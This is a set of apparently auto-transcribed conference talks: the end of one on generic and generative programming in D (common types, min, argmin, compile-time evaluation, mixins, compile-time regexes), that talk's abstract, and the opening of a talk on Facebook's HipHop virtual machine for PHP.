satisfied T's a numeric type or it supports comparison and all that stuff, so you have to only accept types with a valid intersection, and we only want to accept types comparable with less than. Right? So you know what? Let's actually dive into this a bit because I think it's interesting to know about. Right? So I'm going to throw a wall of code at you here, which is not that difficult, so bear with me. So the task is given a list of types, the T dot dot dot. Let's find the common type of them all. So let's find the sort of the least common denominator type of a list of types. It's kind of interesting. Like, you know, if you think of it like I'm giving a bunch of types and it's like, find me the type that everybody converts to. Right? Huh. So, well, if I have one type, then my job is very simple. I'm just going to return the first type, the first and only type. Otherwise, if I have more than one type, well, let me kind of do this very funny construct here, which is type of an expression. And the type of an expression is going to take the expression, not evaluate it because it's all, this all happens smoke and mirrors during compilation. This is not going to, oh, I'm running this and I'm going to evaluate that and it's going to try that and it's not going to work. It's going to throw or whatever and then I'm going to fail. Now, this is all during compilations. The compiler is like, oh, let me test the type of the conditional expression like true one. 
And if it's true, then I'm going to return the first type in it. Otherwise, I'm going to return the second type in it. And this .init thing is giving the initial value of that particular type. So this is actually a value of type T[0] and this is a value of type T[1]. When you do the question mark operator against two different types, what you're going to get as the type of the whole expression is their common type. Because like in C sharp, if you take, you know, condition, floating point number and integer, you're going to get the floating point number and so on, you know, objects, it works like, you know, actually C sharp finds the common ancestor, the closest, you know, the best common ancestor of two types, which is kind of very nice, amazing, right? And this is very nice. So essentially with this operator being designed so well, right, you get to actually use it during compilation to figure out the type, the common type of two guys. So wow. So at this point, well, the length is greater than one. And I'm going to say, well, if this is actually a type that works, and I'm going to call it U, then oh, okay, awesome, I'm going to make progress here because I'm going to recurse to common type with U and the other types in the list. And I'm going to alias that to common type. And if nothing works, I'm going to say, you know what, I'm going to give up. And the common type of these types is void, which means there's no real type that's going to work there. Right? Okay. So let's recap. If I have one type, it's obvious. If I have more than one type, I take the common type of two types by the magic of this typeof expression. I give it the name U. And if that works, I'm going to say, well, then common type is the common type of these two types and then the trailing other types. So recurse, right, in a way. And yeah. What does the? What does the? The bang. The bang. Oh, the bang is template instantiation. So C sharp chose the, you know, angle brackets. C++ chose the angle brackets. There's an enormous amount of pain that has been caused to parser writers and developers because of the angle brackets. And D went like, you know what, I'm going to instantiate with the bang. So that's how we roll. Okay. So let me note something. This is sort of a unit test: static assert that the common type of int, short, and long is long. So let me take a break here and make sort of a side point. This is the kind of stuff that developers, like, you know, I want to get work done in this language, right? This is the kind of work that developers don't care about that much. It's not typical. Like, oh yeah, at my day job, I figure out the common type of three types. You don't do that, right? This is the kind of stuff that, who's worried about, like who's doing this stuff? What kind of people? Like, who, who, who, right, what? Compilers. This is the kind of stuff that the compiler writer is going to be busy about. Yeah. During my compiler work, I need to figure out, I'm given, I mess with types all the time. So I need to take, yeah, the common type of these two types, I know, I don't know what it is, right? So this is the job of a compiler writer. And the fact that it's actually in the compiler, it's not in user code, so it can't be part of the target language that you're using. So we're getting to this really weird thing. And it's good weird, I would argue. We're getting to this weird thing where you do type manipulation, kind of compiler grade, if you wish, right?
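A sketch of the CommonType computation being described — the real library version differs in details, and the names here are illustrative:

    // Find the type that all of T convert to, or void if there isn't one.
    template CommonType(T...)
    {
        static if (T.length == 1)
            alias CommonType = T[0];
        else static if (is(typeof(true ? T[0].init : T[1].init) U))
            // U is the common type of the first two; fold it with the rest.
            alias CommonType = CommonType!(U, T[2 .. $]);
        else
            alias CommonType = void;
    }

    // The "unit test" mentioned a moment ago:
    static assert(is(CommonType!(int, short, long) == long));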
Kind of, you know, compiler, I'm a compiler pro and, you know, I'm kind of doing compiler things. But, you know, it's not really compiler stuff because you're doing it in the target language, in D. You're not doing it in the decompiler, which may be written in other language. You're doing it in the library, in there, in the target language. And you're manipulating types and kind of figuring out things about types and interest in this introspection kind of thing. And it's all static and it's all great. So this opens up a lot of nice possibilities. Like, you know, the D standard library has a bunch of, you know, traits like that. It gives you the common type of types. It can, here's a nice one. For mocking. You know what the white hole is? White hole. White hole is like you have an interface. It has an influence, like it defines, like, you know, seven methods or whatnot. And you find a white hole, which is the opposite of a black hole because it rejects everything. So you find a class, which is an implementation of the interface and whatever you call, it's going to throw an exception. That's a white hole, right? And it's used in testing and in, you know, people use it for mocking and for things like, you know, I want to implement just one function of this interface. I don't care if the other should throw because I don't implement them, right? So I see not. So I see people kind of having seen that. And actually in Java, it's an idiom. Like people say, oh, yeah, I went into a white hole here and people are in prayer, like, they're like, yeah, I have a white hole here. And in other languages and so on. But it's all done by hand. So it didn't even occur to people that, oh, actually that's an automatic thing to do. Right? And why didn't it occur? Because it's the job of a compiler writer usually to do that kind of stuff. Yeah, let me kind of add a feature to the language that implements this white hole thing. Right? However, in D, there's a white hole thing that's, that uses completely like standard features of D that are available to all programmers. And it's kind of very interesting that you get to implement such things, like for each member of the class, generate a function that's going to throw an exception. This is pretty cool, right? So okay, parenthesis closed. Yes? If the contract of the interface should not throw, then you have no business throwing. That would be a programmer error, right? Because it shouldn't instantiate the white hole with that interface. But it's a good point. And in Java, it would be better off because you have the checked exceptions and all that. So anywho, that's a good point. Well let's use this common type guy. So we're back to many of these whatever in the length of the list has to be greater than one. And then we say, well, type of the common type of T dot in it less than common type of T dot in it is bull. So what I do here is I take the common type of all these and I create the value from it by means of dot in it. So dot in it means, you know, give me the default value of that type. Like for instance, like dot in is like zero, right? And for characters, like, you know, all ones because that's an invalid character and that kind of stuff. And for floats is nan and that kind of stuff. So but I don't care about the value here because it's all compile time stuff. So I say, well, let me take the type of common type of all these dot in it is less than common type of all these dot in it. And that type is got to be bull because that's what mean asks for. 
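Spelled out in code, the constraint just described — the length check plus the "comparison with less-than yields bool" check, using the CommonType sketch from above — might read roughly like this:

    auto min(T...)(T x)
        if (T.length > 1 &&
            is(typeof(CommonType!T.init < CommonType!T.init) == bool))
    {
        static if (x.length > 2)
            return min(min(x[0], x[1]), x[2 .. $]);
        else
            return x[0] > x[1] ? x[1] : x[0];
    }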
And in these two lines, I got to say the types have a common type actually in fact, it's not void. And the types are comparable. And you know, there's more than two, more than one, right? So we have this nice Boolean condition and then with the body is the same. But this point, we got actually we got like full bore because it's the mean that, you know, this is what I wanted in the first place, right? So I kind of have satisfied all of my requirements. So again, it's amazing that we need to talk about this. The fact that different languages take so wildly different stances on this, especially with regard to efficiency is a sort of, you know, it's a slap on the face of, you know, our community as software developers in general because a very simple thing to do. So I'm going to go back to this. You're losing the? Yeah. Okay. So I'm using a good point. So the point was you're here using the less than operator and here's in the greater than operator, right? Oh, not here. Sorry. Yeah. Wrong, wrong laser here, right? In D, they're equivalent. In D, using this is the same as because they're all boiled down to the same comparison. It's a good point for which reason are in town tonight. All right. Congratulations. Nice shoes. Yes. This is awesome. Okay. All right. So, yep. Okay. So this is a very good question. I'm going to repeat it in a second. I mean, time tonight. Okay. So the question was, well, if I have an unsigned internet named, it's weird. Let's say they have the same size for starters, right? They have the same size, 32-bit or whatever, right? 32-bit, one unsigned, one unsigned. Am I going where you want it to be? Okay. And then I want to take the min of the two and, you know, what's going to happen then, right? Well, I guess it's okay because Indy's going to be able to represent everything. The max, okay. So let's switch to max and now I have an unsigned and I have a signed and I take the maximum. What's going to happen next? Who can represent everything? The unsigned guy is going to be able to represent everything. So if you return the unsigned, you're in good shape already. I think the problem comes when you try to compare an unsigned 32 to a signed 64 and then you get into problems. You have a common type between the unsigned and the unsigned. Well, Indy has the following principle. So you know, the question was like, what's the common type of signed and signed and stuff like that. So D follows the following principle. It's quite similar to C, like there's like a large part of D that's similar to C and kind of inherits in many ways. And therefore, people, people, it's a practical thing. People take a bunch of C code and they put it, they throw it in a D file and they hit compile. And then we have two traces. We succeed to compile, oh, okay, the simpler one. We fail to compile and that's fair because there's stuff that, you know, this is too unsafe for us, you know, it's not our taste, not our cup of tea, too unsafe code, whatever. That's fine. But let's say we succeed to compile that program. And if we succeed and if we have different behavior, that would be a disaster because people would come like, you know, well, I took this encryption, you know, RSA algorithm, encryption that's like, you know, 7,000 lines of C, like paste it into a D program. It compiled what it doesn't decrypt. It compresses, actually. You know, something, I don't know. That's something else. You know, it's, whoa, that would be weird. It's, yeah, we don't want that to happen. 
However, whenever D compiles just C code, it's going to do what C does. So it kind of has this nice preservation of semantics. And C has a rule. It has many, you know, several rules, but it has one simple rule which is, you know, in expressions involving signed and unsigned types, unsigned kind of wins most of the time. So actually the way I like to say the rule, kind of in jest, is like if an unsigned is within one mile radius of an expression, the expression is going to be unsigned. That was a joke. Thank you. Awesome. Okay. So because of that, we have this unsigned int32, signed int32, unsigned is going to win. And that can cause some problems which we eliminate through other means. But anyhow, I think the main point here regarding this whole unsigned comparison mess is that you get to manipulate the types any way you want, and actually min in the D standard library does do that kind of, you know, semantics-sensitive typing, which is very interesting. Yes? When you have reference types, this would be, for a reference, just null? When you have a reference, yeah, this would be null. Okay. Yeah. But that's fine because we don't evaluate this. We just, yeah, we just look at the type. All right. And you know, there's all this discussion like, you know, people say it's good to have like non-null types, right? Types that can never be null. And this has been a sort of a sore thumb for D because D has null, and we kind of decided to make a library solution for it, and so there's a non-null type right now which is being discussed, which is kind of interesting. All right. Am I supposed to be about done? No. Someone finished early. That's nice. Okay, though. So far so good? All right. Well, where was I? Okay. So this kind of, what happened here? Okay. So far so good. Okay. Well, so it's one thing to say, well, I want to take the minimum element of like three guys. That's fine. But what if I take the minimum element of an array or a stream or a file or, you know, kind of a database or whatnot. So at this point we get, okay, so it's sort of more of the same. I'm going to take min from a range, which is some sort of collection of elements that can be iterated through. And this whole range thing has sort of exploded in popularity with D because it's a central concept to D, which means, you know, C++ has iterators, Lisp has lists, s-expressions and whatnot, and for D, ranges are sort of the thing. So we say, well, if I have an input range whose elements can be compared with less than, then I'm going to do a foreach loop. I'm going to say, yeah, for each element, just, you know, do this and do that and the other. And that's a nice implementation of min. And before anyone mentions it, I should tell you that, you know, you actually don't want to write this because there's a reduce function in the standard library, and it's just reduce with min over this range, and it's going to just work, right? So this is kind of showing you from sort of almost first principles kind of thing, like, you know, bona fide, you know, good developer code, I'm going to write a for loop and I'm going to do that and stuff like that. You don't want to recurse because then you have, like, you know, you've got to be careful about making it tail recursive and all good stuff. So this is a good example for the sake of a presentation. Now, I say, one nice thing is, like, you know, I don't need to specify the type, it's going to kind of take care of itself. I say auto, type deduction for the win, right?
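A sketch of the range version just described — the exact constraints and names on the slide may differ:

    import std.range : isInputRange;

    auto min(Range)(Range r)
        if (isInputRange!Range && is(typeof(r.front < r.front) == bool))
    {
        auto result = r.front;   // auto: the element type is deduced
        r.popFront();
        foreach (e; r)           // walk the rest of the range, one element at a time
            if (e < result)
                result = e;
        return result;
    }

    // The library way is essentially: reduce!((a, b) => b < a ? b : a)(range)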
And what else is interesting here, I'm taking the first element, I pop the first element — I guess this pretty much writes itself, right? foreach knows how to pop elements from a range. So I guess, you know, if you squint a bit, because for example, I didn't define what an input range is — it has a front, has an empty, has a popFront, that kind of stuff. But if you squint a bit, I'm sure you kind of get the gist of it. Great. And it's nice because it works over anything that can be iterated, and there's no amount of overemphasizing I can do here, because this sort of generality is typical of generic programming, which is to say, yeah, I can take the — like, in Java it's very typical, like, yeah, I know how to take the middle of an array, but that helps in nothing in terms of taking the middle of a singly linked list. And that in turn doesn't help me much for defining the middle of a doubly linked list and so on. So, you know, this kind of generality is not actually very well represented in some languages. Here essentially this is sort of the very essence of the min algorithm, you know, the loop over anything, because anything that has these primitives, you can min over those, right? So this is sort of the essence of I want to take the minimum of many elements, of an arbitrary number of elements. By the way, let me ask you this. Do you know edit distance? Right, okay. Levenshtein, edit distance, like, you know, I have two strings. How many edits does it take to transform one to the other? And what kind of data structures does it work on? Like what is the minimum data structure? You know, edit distance, like, look at these guys, the dynamic programming, interviewers love it, you know. Arrays, strings — yeah, so it's typically for strings, but more generally like arrays, right? Yes? Lists. All right, so actually it's kind of very interesting that edit distance works on lists, but actually I saw an implementation in Haskell where the author kind of didn't figure that out and said, oh, I'm going to use arrays here. So actually edit distance works on lists. This is the minimum you need. You know, you don't really need arrays. Arrays would be sort of a total order, because they have to be contiguous and all that stuff, and you don't need random access. You don't need random access for edit distance. And this is the kind of job you would do as a guy who does that, who does generic programming. You would think about these things, like, you know, what is the minimum data structure that edit distance works on? And this is the minimum thing that min works on, because here's an interesting thing. For min, do you need to ever look back in the range? Do you need to kind of remember, oh, the fifth element I saw, oh, fifth element, nice. The fifth element I saw was that, you know, this is important to me. Is it? No, because you kind of just walk the bridge and the bridge can kind of just sink behind you, right? You don't need what's behind. So you're going to look at the current element, and after you're done with it, you're done. And that's an input range. It's a stream. It's something that is evanescent. It doesn't have a presence in memory. So you can take the min of a very large file and it's going to work. And that's, you know, SQL actually is big on that kind of distinction. So this is very nice because input ranges represent exactly that notion. It's an input range. It doesn't have to be in memory. It could, as the example shows, it could be an array.
I don't care, because an array is better than an input range. It has more stuff to it, so much the better. For min, I don't care about the good stuff that the array has, except for the fact that I can actually look at one element at a time. Awesome. Well, argmin is a very, very popular — all right. Nothing happened. The situation is under control. All right. I walk too much. The camera folks are going to kill me. Okay. So argmin is sort of a popular notion for machine learning people. Like, you know, I want to take the minimum argument, you know, the index of the minimum element, the smallest element. So that's not much more difficult. I just have to kind of do a bit more work by kind of caching the stuff and kind of saving the candidate. And you know, so my result is going to be the first element. I'm going to cache the function value and all that stuff. What I want to emphasize here is this. Argmin, alias fun. So alias fun — it's a higher order function, right? So argmin is a higher order function because I want to say what is the minimum, you know, argument in this range for which fun gives you the minimum, right? So I want to say argmin of square root or whatever. I want to, that's easy. Argmin of tangent or argmin of whatever, right? And at this point, I have a higher order function argmin that takes an alias and a range and is going to use the alias to invoke the function. And the nice thing about pass by alias is that it's extremely efficient. So one known issue with many functional languages of today is that as you stack these nice abstractions, map, reduce, and you know, higher order functions and stuff, they all have one indirection each. So by the time you have a stack of like seven, there's going to be like, you know, literally like seven indirections to get to where you want to be, right? Pass by alias short-circuits that by saying, you know, I'm going to instantiate for this particular function, I'm going to make a separate instance for this other function. So this is pass by alias. And again, the usual discussion of, you know, generated code size versus dynamic library size and, you know, that binary code reuse question that you asked — these kinds of caveats still apply, of course. So argmin, right, takes a function. Let me see if I have an example for argmin. Oh, thank God. Okay, great. So I have, well, I have a number of strings or whatever. And I want to say, well, which string has the smallest length, which string is the shortest in this input? So I have the strings and I apply this lambda, which maps anything to its length. And that gives me, you know, the shortest one in the end. So with this, I kind of talked about things like, well, let's talk about, like, you know, what does it take to write a good, a nice min function, which is completely reasonable? And we figured out, you know, there's a lot of wanting solutions. But then we discussed, if you do the appropriate type manipulation, it's good. And the question is, you know, how can we put the means in the language to do such kind of type manipulation? And I talked about things like static if, which is great. I talked about, like, pseudo recursion, which is great. I talked about pass by alias, which is great. Okay? So this point here is very important. Because I have, you know, there's a lot of talk about, like, you know, I don't care about static languages. I'm going to do dynamic languages and such.
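For reference, the argmin with pass-by-alias described a moment ago could be sketched like this — whether it returns the element or its index is a detail, and the names are illustrative; this version returns the element:

    auto argMin(alias fun, Range)(Range r)
    {
        auto best = r.front;
        auto bestValue = fun(best);   // cache the function's value for the current candidate
        r.popFront();
        foreach (e; r)
        {
            auto v = fun(e);
            if (v < bestValue)
            {
                best = e;
                bestValue = v;
            }
        }
        return best;
    }

    // e.g. the shortest string in a list:
    // auto s = argMin!(a => a.length)(["generic", "and", "generative"]);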
And at least for my kind of workload at Facebook, you know, I think, I think this is going to be more general because big data and, you know, that kind of stuff is going to be more of it, not less of it in the future because the amount of data you play with and the amount of interesting things you want to do with it is just going to grow. And computers are not going to get any faster. So the question is, you want to distribute the thing. And at the same time, you know, your speed of processing is going to be proportional to the number of machines you use, but also proportional, like, in a very direct way, like, there's a multiplication there with the speed of each component. And we get to this point where we're asking ourselves, like, you know, I can distribute this thing very nice, but then it depends on the speed of each component. And if I can't make it fast enough, it's going to hurt me. And actually, even if I distributed it, there's a guy who says, I'm doubling the number of machines. Well, you're going to double the amount of power needed by those machines. And this is the major limitation here. I'm really digressing here, am I not? Okay, but I think this is nice. This is interesting to talk about, right? So the power needed is humongous at Facebook scale. I can't give you specific numbers, but I can say that every 1%, every 1% saved in efficiency of the site. And think of it that way. One person, like, many people say everything below 10% is negligible, right? So I'm talking about 1%, and I mean, people, like, work on a fraction of a cent, 1%. So 1% saving of speed, like, increasing speed of the site is a very significant amount of money in power costs of data centers alone. And that's the case for Facebook. It's a case for Google. It's a case for Amazon, Yahoo, and many others. And there's an increasing number of these companies that are going to have to use power as they're defining means of calculating costs. So that, for that reason, you can't afford often to say, you know what, I don't care about this, but it can, yeah, seven directions, I'm cool with that. You can't afford to be cool about that, quite literally, because it's going to be hot, right? So the machines are going to get really hot, right? All right. If you're more interested in that kind of topic, you should come see my second talk today, which is going to be at 3 o'clock in room 2, which is going to be about a very nice jit architecture that we've done at Facebook. I'm very honored to be part of that team now. And to see how, you know, exactly what it takes and how we did it to accelerate Facebook for 1 billion users. The process is closed. So now, let me kind of change gears a bit. Because, you know, many people say, generate programming, generative programming. And many people say, you know, there's this whole genetic programming, right? Which is unrelated. It's like machine learning, right? Genetic, we don't do that. We don't talk about that here, right? But there's generic and there's generative. Can you define generative for me? Generative, generative. Well, it's, I mean, if I didn't know anything about it, I would say, you mean, say, generate stuff, right? And actually, the reality is very close because it's programs that generate programs. It's code that generates code. Which is, oh, interesting. Let's see. Well, there's a connection here because generic programming very often requires specialization of algorithm which we want to generate automatically. 
And very often the specification is present in a DSL, a domain specific language. Tell me a DSL that you use every day, day to day. Talk to me. SQL. SQL, awesome. This side, didn't talk much. Come on. I swear you use one every day. Regexes. Not everybody should use them — I'm not saying what you should be using. You know, regexes, everybody's using them even though they shouldn't or whatever. So regexes, a lot of us use them, right? Makefiles. I mean, come on. It's a DSL. It's like, you know, and whatever, you know, whatever you use. What do you use? What's the latest and greatest? And? Is this what? SCons? Who's using SCons? All right. Who's using the Microsoft built-in whatever, right? Okay. So that's sort of, even if that guy is sort of a DSL, although you manipulate it graphically, all right? So very often you have this DSL notion. I've got makefiles. I have regexes. I have printf format specifications, you know, string templates, all that stuff. All of that is DSL kind of stuff, right? That's very interesting. So what do we do about implementing these DSLs? Well, one simple solution is like, well, we're going to kind of make the language, the host language, look like the DSL and we overload the operators, some of that good stuff. And I don't think that's a great thing, but, you know, whatever works. And I gave some examples already. Some more interesting examples are EBNF grammars, right, to define a language compiler. Parsing expression grammars — this is all EBNF on steroids. SQL was mentioned. And, you know, to try to force each and every of these DSLs into the same host language would be a bit forced. So indeed, we have a different approach which is very interesting. We kind of stumbled upon it. So we're going to use the DSL with its native grammar. We're going to process the grammar in compilation and we're going to generate the code accordingly. It's not a macro system. It's sheer code generation from strings. And let me start with a little insight. So this is an absolute classic, right? I don't need to talk about, like, how do you implement factorial in a language that has loops? Yes, this is how you do it. Okay, so this is interesting, but here's the thing. Well, I have factorial of 10 and I get an auto — this is like a ulong. f1 is factorial of 10. And I say static f2 is factorial of 10. When I do that, the compiler is going to evaluate the factorial during compilation. Okay, this is how I'm going to — all of a sudden people wake up, like, you know, what, what? Okay, so this is what happens. You have one body, but you can actually compile it and evaluate it like classic, like any imperative language would do, but you can also, with the same core syntax, evaluate during compilation, as long as you evaluate within a static context. Huh, what the hell can we do with that? Well, let me tell you about the second component of this ploy here. There's a mixin keyword that says, you know, give me a string and I'll make it into code. So give me a string and I'll compile it, right? It's like eval, but it's compile time only. So I can actually call a function and the function is going to be evaluated in compilation. It's going to give me a string and I'm going to transform that string into code, which is, oh, what's going on here? So, okay, so we have two things now. Compile time evaluation, and we have mixin.
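Sketched in code — with the caveat that the slide may use static rather than enum to force the compile-time evaluation, and the variable names are illustrative:

    // One body, two evaluation contexts.
    ulong factorial(uint n)
    {
        ulong result = 1;
        foreach (i; 2 .. n + 1)
            result *= i;
        return result;
    }

    void example()
    {
        auto f1 = factorial(10);   // ordinary run-time call
        enum f2 = factorial(10);   // same body, evaluated during compilation (CTFE)
        static assert(f2 == 3_628_800);
    }

    // And mixin turns a compile-time string into code:
    mixin("int generatedVariable = 42;");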
And at this point, you've got to imagine we had a big, like, oh-my-God moment, because you get to generate strings with compile time evaluation and you get to mix them in as new code. And that's how WhiteHole is implemented, by the way. Right? So you get to actually do real work during compilation and mean it, like, you know, real, like, actual work. You can create objects, you know, do stuff, right? And then you get to generate strings during compilation, and those strings, you get to actually say, compile the stuff, right? All right. So this is kind of a big insight. And here's how D does bit fields. D doesn't have a bit field facility built into the language like C, because we thought it's, like, you know, too low level to dirty our hands with it. But there's a very simple mixin function that takes a type, takes a name, and takes a width. And you give it more of these guys and it's going to take care of generating all the code that takes care of the bit fields, you know, all the masking and all that, you know, rotation and all that stuff. And all of it is library code, it's not in the compiler. But this is just the start. I mean, you know, it can get really, really interesting. I mean, consider this. There's work by Philippe Sigaud, which is, you know, he defined a grammar parser and a code generator, and you have a simple expression evaluator here. Expression is like factor and, you know, more factors, and then I have an add expression, which is plus, minus, plus, minus, factor and whatnot. So you have this grammar syntax in a string. That string is passed into the function called grammar, which is defined by this guy. And the result is a string of code, which you're going to ultimately mix in into your D code, and congratulations, you got yourself a parser. This reminds you of, like, lex, yacc, and ANTLR and derivatives, right? But it's all in D — it doesn't need any extra kind of program, right? And it sort of holds water in a — oh, I'm kind of almost over the time here. Thanks for not mentioning that to me. All right. So, very easy to kind of play with this. But you know, my point here is that it kind of holds water because, you know, the D grammar itself can be expressed in 1000 lines, and it generates actually 3000 lines of actual parser code, so you put the grammar of D in, and it kind of parses it with D, and you generate D, which you compile, and what you compile is D. Oh my God. Okay. I'm not even sure I said that correctly. All right. So you can think of it as a highly integrated lex and yacc. And the last point I would like to make before I go, you know, and wrap up and whatnot, is an actual practical result. So there's regex, which is kind of the classic thing. You can take a string, standard input or whatever, and you make it into a regex, and that's fine. This is sort of the classic thing. And then there's ctRegex — it takes the string during compilation and it does its own specialized automaton generation in there. Now question, which is faster? The same string. It's the same regex. Which is faster? What do you think? So the first is kind of a bona fide classic regex that people do today. And the second takes a string, looks at it, and generates a specialized automaton just for that particular regex. Yeah. The second is going to generate its own state machine. The first is going to generate a generic state machine which is going to work for all regexes and is going to carefully kind of do things. Which is faster? The second one, or the last one — which is correct. What other opinions? They're equally fast — okay, great.
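The two declarations being compared look roughly like this — std.regex's regex versus ctRegex; the pattern is just an example:

    import std.regex;

    auto r1 = regex(`(\d+)-(\d+)`);        // general-purpose engine, pattern handled at run time
    enum r2 = ctRegex!(`(\d+)-(\d+)`);     // specialized matcher generated during compilation

    // Both are used the same way, e.g.:
    // auto m = matchFirst("2013-06-13", r2);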
Well, I think in, like, a perfect world, maybe — but probably no. Because this guy has the ability to kind of generate a very unique code, a parser or automaton that's only going to work for that particular string, at best, right? Now here's the difference. All right. So first you have your Java 7. If you want to do fast regex, don't do this, right? You don't want to use that. Kind of slow. Everything else is kind of here, right? This is a C++ library written by my friend Eric. This is the runtime edition of the regex that I just told you about. It's called FReD. All right, so it's kind of there. And then we have RE2, which is a highly optimized generic regex engine kind of written in C++. And then we have V8, which is the Google JavaScript regex, which actually uses specialization inside and all those good things. Which is like wicked fast. So this is like the fastest in the world, V8, right? And then there's the compile time version of the D implementation, which is actually faster. So V8 is like, oh my God, it's the fastest in the world. It can't do better. And then the student comes, and at Google Summer of Code last year he wrote this, which is actually faster than the fastest in the world. Faster than the fastest in the world. Thanks very much. Thank you.
|
Generic programming holds great promise – ultimate reuse, unprecedented flexibility, and never a need to reimplement an algorithm from scratch due to abstraction penalties. Unfortunately, the shiny city on the hill is difficult to reach. C++’s generic power has effectively reached a plateau – anything but the simplest generic constructs quickly turn an exponential complexity/benefit elbow. C++11 fails to be a strong sequel in the generic programming arena, and many other languages don’t seem to “get” genericity properly at all. The D programming language is a definite exception from this trend. D makes short work of the most formidable generic programming tasks achievable with C++, and makes virtually impossible tasks readily doable. It also reduces the relevance of “Modern C++ Design” to that of an introductory brochure (much to the dismay of that book’s author). This talk has a simple structure. It will pose a few generic programming tasks that seem difficult or impossible with current language technology, and then will show solutions in D that solve said problems.
|
10.5446/51538 (DOI)
|
Hi, my name is Andrei Alexandrescu. I'm seeing a few folks who've been in my first talk today. This talk is going to be quite a bit different. I'm going to talk about some work by Facebook, which is relevant because it's open source, so it can be used by anyone. It's a virtual machine for the PHP programming language. And before you answer in kind with, you know, what's wrong with you, using PHP, and all that stuff, I'm going to thoroughly argue the point that such a virtual machine and JIT is a good thing to have, and using PHP has certain, you know, it has certain assets going about it, in particular for Facebook, which has an interesting history with PHP. So the HipHop VM has been Facebook's production PHP engine starting sometime November of last year, and it has been the workhorse behind Facebook ever since. It's a JIT compiler, meaning it can interpret code, but it can also, on the fly, compile code down to native x86 assembly and execute it all at once. And it has an unusual compilation strategy, which we're going to discuss, which I find interesting and applicable to a variety of other languages. So as I mentioned, I'm going to argue, you know, why PHP? So PHP has a number of liabilities, which are well known and discussed in the community. I'm seeing some already, I'm seeing a couple of smirks from people in the audience, like, yeah, you know, PHP — aren't you the D guy, with all this clean language and stuff, and, you know, what's wrong with you? Well, consider, like, let's turn the clock back nine years, 2004. At that point, Facebook was just starting, and, you know, the now historical dormitory at Harvard and all that good stuff. And at that time, there's not a lot of choice in terms of, like, let's build a great website, distributed and, you know, used by a billion people and all that stuff. First of all, there probably weren't one billion people online at the time, 2004, let's say — maybe there were one billion people, but that was it. So at that time, PHP was pretty much the choice, you know, the default choice of a language if what you wanted to do is build a site real quick, you know, a seat-of-the-pants operation, like, you know, literally on your desk you have a machine and it's shared by, you know, six users at a time or whatever. And you want to develop real fast, connect your database, have all that rapid cycle of development. So PHP was it. And PHP has one very interesting thing going for it as a language that's aimed at robust development, as strange as that might sound, which is the following. In PHP, every request, so essentially the lifetime of a script in PHP, lasts from the moment the request is made until the request has finished. After that, it kind of goes away, right? Well, that state goes away. In contrast, there are many other web services engines that actually keep state between invocations and kind of try to resurrect the zombies from the last request and stuff like that. For PHP, the simple life cycle of a script turned out to be very successful for Facebook, because any bugs either in the engine or the scripts being run, any memory leak, you know, any issues that there were, would essentially disappear with the termination of that particular request, which means any other fresh request would start with a brave new world, clean slate, and would just run however it runs.
So, well, 2004, Facebook is launched using PHP, had a relatively low traffic, which has grown ever since, and it's become sort of a blessing and a curse in the sense that right now we have many millions of PHP code at Facebook, and it is, you know, like, you know, PHP used by very good developers, it turns out to be a very convenient tool to have around. So essentially, like, anything you want to that Facebook, like, you know, any change you want to make to the site, you can very easily dog food stuff that we already have working and tested and thoroughly, you know, streamlined. So once you consider this, it is very difficult to imagine for a Facebooker to imagine day-to-day work as a front-end designer without kind of just, yeah, I need to get a list of friends, so I need to kind of, you know, display with look ahead and all that stuff. It's like, it's literally like lines of code away in PHP with the tools that we have. Definitely, you wouldn't imagine just as a sort of a site. So how many of you are using Facebook like graph search, like, you know, the search at the top of the Facebook? Yeah, okay. So you know what I'm talking about, like, there's this thing, and essentially search for friends, if I search for OVE, and I type OLV, and by that time I see this guy who's like testing his camera on me right now. I thought he's bootlegging me, which made me feel real good for a few seconds there. So, you know, essentially type a few letters and you see out of, like, you know, not only 150 friends or what have you, but out of literally like 1 billion people, because you can find people who are not your friends and are directly connected to you and kind of, you know, second degree connections and the kind of people around you geographically and all that good stuff. And, you know, we wouldn't build that in PHP. So let's clarify that. We wouldn't build that in PHP. There is a service that is implemented in a system language, namely C++, which is going to have an index, literally there's a hash table with millions of elements like a billion elements or whatnot. And this hash table is stored on distributed on many servers and the PHP service is going to give a very simple, easy to use interface to that real-time service. So, you know, it's good to make a distinction between what you can do and what you think of in different levels and in different languages. So all that being said, parenthesis closed, PHP is a great tool for ad, just one that widget, just put it on the page and it's there and it just works. This has worked like tremendously well for Facebook. I should add that it may not work just as well for the same size of code at other companies because at Facebook there is a huge focus on good engineering and kind of, you know, hiring the best engineers and such, whereas kind of saying, you know, let me kind of hire like a few average developers and try to build a big thing with them, it's more difficult because, you know, unless you use PHP with care, it's going to exhibit all of the issues that we know has, like, you know, plus has the return times completely bizarre and things like that. So at Facebook with the appropriate discipline and kind of use of talent, we're going to kind of carefully avoid such problems. So continuing the story, from 2004 to 2009 we used the Zend interpreter, which is a switch on bytecode C interpreter. 
So essentially it's a, literally it's a big switch, and it reads the next bytecode, which is like one octet, like, you know, one byte, and which is the bytecode representation of the PHP code. And depending on that guy, it's going to do different actions, you know, fetch operands and do stuff and whatnot. And that's pretty much the most direct implementation of an interpreter that you can think of. But we figured Zend is too slow for us. We also figured out, you know, again, the code was being so big, it was at a point sort of a lock-in issue because we couldn't switch the language cheaply, right? So in 2009 we launched HipHop, the static compiler, which is kind of an interesting endeavor. Take the PHP code, compile it to C++ code, which creates like a large, humanly next-to-unreadable C++ program, right? And it's all kind of, you know, virtual dispatch and all kinds of dynamic typing and all that stuff. But it's in C++. And then take that C++ code and compile it with a state of the art compiler, such as GCC. And at the end you're going to get a two-gigabyte binary, which would not even work on 32-bit machines. You have this two-gigabyte binary, which was Facebook, was the site. So you know, launch that guy and just, it's Facebook. It serves Facebook. I'm going to open another parenthesis just for you, because I find this story just too funny. So you have this big C++ program. So you can imagine any number of problems happening with a large, generated C++. C++ is a terrible intermediate language to work with. And here's an example. That program had 30,000 global variables. It's generated. I mean, in a way it's no sin, right? It's generated. So you can say, I didn't sin, father, you know, that kind of stuff. So it has 30,000 global variables. And it was real slow to compile. So you kind of, you know, we issued a bug report to GCC — what's going on there, folks, you know, why is it so slow? And they said, well, you have 30,000 global variables and we put them in a singly linked list and we search that list for name lookup. So it was a kind of linear search for 30,000 things whenever you have a name somewhere. And we said, well, then better fix that crap, because, you know, linear search in this day and age is kind of embarrassing. And they said, no, guys, you're embarrassing, because you have 30,000 globals. Like, no sane program in this world should have this many globals. And we're like, all right. So compiling the site took a good few hours. And not only because of that. It's a very large program after all. So, parenthesis closed. So we've been running with that engine for a good while. And can you see any problem with this model of building the site? Like, think of this. Think of your PHP developer working on the site and you want to kind of, you know, get work done. What problems do you see? Not you, because you already 